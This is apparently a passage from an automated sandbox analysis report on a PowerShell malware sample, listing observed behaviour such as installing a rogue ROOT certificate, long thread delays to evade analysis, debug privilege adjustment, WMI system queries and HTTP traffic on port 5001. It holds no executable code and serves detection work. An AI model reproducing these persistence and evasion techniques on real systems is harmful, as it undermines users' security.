Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ncrypt.dllJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ncryptsslp.dllJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ieframe.dllJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: netapi32.dllJump to behavior
Source: C:\Windows\System32\notepad.exeSection loaded: kernel.appcore.dllJump to behavior
Source: C:\Windows\System32\notepad.exeSection loaded: uxtheme.dllJump to behavior
Source: C:\Windows\System32\notepad.exeSection loaded: mrmcorer.dllJump to behavior
Source: C:\Windows\System32\notepad.exeSection loaded: windows.storage.dllJump to behavior
Source: C:\Windows\System32\notepad.exeSection loaded: wldp.dllJump to behavior
Source: C:\Windows\System32\notepad.exeSection loaded: textshaping.dllJump to behavior
Source: C:\Windows\System32\notepad.exeSection loaded: efswrt.dllJump to behavior
Source: C:\Windows\System32\notepad.exeSection loaded: mpr.dllJump to behavior
Source: C:\Windows\System32\notepad.exeSection loaded: wintypes.dllJump to behavior
Source: C:\Windows\System32\notepad.exeSection loaded: twinapi.appcore.dllJump to behavior
Source: C:\Windows\System32\notepad.exeSection loaded: oleacc.dllJump to behavior
Source: C:\Windows\System32\notepad.exeSection loaded: textinputframework.dllJump to behavior
Source: C:\Windows\System32\notepad.exeSection loaded: coreuicomponents.dllJump to behavior
Source: C:\Windows\System32\notepad.exeSection loaded: coremessaging.dllJump to behavior
Source: C:\Windows\System32\notepad.exeSection loaded: ntmarta.dllJump to behavior
Source: C:\Windows\System32\notepad.exeSection loaded: urlmon.dllJump to behavior
Source: C:\Windows\System32\notepad.exeSection loaded: iertutil.dllJump to behavior
Source: C:\Windows\System32\notepad.exeSection loaded: srvcli.dllJump to behavior
Source: C:\Windows\System32\notepad.exeSection loaded: netutils.dllJump to behavior
Source: C:\Windows\System32\notepad.exeSection loaded: propsys.dllJump to behavior
Source: C:\Windows\System32\notepad.exeSection loaded: policymanager.dllJump to behavior
Source: C:\Windows\System32\notepad.exeSection loaded: msvcp110_win.dllJump to behavior
Source: C:\Windows\System32\notepad.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{11659a23-5884-4d1b-9cf6-67d6f4f90b36}\InProcServer32Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dllJump to behavior

Persistence and Installation Behavior

barindex
Installs new ROOT certificates
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeRegistry value created: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\3F728A35DE52B2C8994A4FB101A03B95E87B06C8 BlobJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeRegistry value created: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\3F728A35DE52B2C8994A4FB101A03B95E87B06C8 BlobJump to behavior

Hooking and other Techniques for Hiding and Protection

barindex
Loading BitLocker PowerShell Module
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
Uses known network protocols on non-standard ports
Source: unknownNetwork traffic detected: HTTP traffic on port 49705 -> 5001
Source: unknownNetwork traffic detected: HTTP traffic on port 5001 -> 49705
Source: unknownNetwork traffic detected: HTTP traffic on port 49707 -> 5001
Source: unknownNetwork traffic detected: HTTP traffic on port 5001 -> 49707
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeKey value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\3F728A35DE52B2C8994A4FB101A03B95E87B06C8 BlobJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 6136Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 3647Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 1848Thread sleep time: -10145709240540247s >= -30000sJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 1276Thread sleep time: -1844674407370954s >= -30000sJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_ComputerSystem
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\userJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Roaming\Microsoft\WindowsJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\desktop.iniJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Roaming\MicrosoftJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\RoamingJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppDataJump to behavior
Source: powershell.exe, 00000000.00000002.2181257859.0000000006D57000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information queried: ProcessInformationJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: DebugJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\assembly\GAC\Microsoft.mshtml\7.0.3300.0__b03f5f7f11d50a3a\Microsoft.mshtml.dll VolumeInformationJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.Management.Infrastructure.Native\v4.0_1.0.0.0__31bf3856ad364e35\Microsoft.Management.Infrastructure.Native.dll VolumeInformationJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformationJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformationJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformationJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1.cat VolumeInformationJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformationJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.Management.Infrastructure.CimCmdlets\v4.0_1.0.0.0__31bf3856ad364e35\Microsoft.Management.Infrastructure.CimCmdlets.dll VolumeInformationJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.Management.Infrastructure\v4.0_1.0.0.0__31bf3856ad364e35\Microsoft.Management.Infrastructure.dll VolumeInformationJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
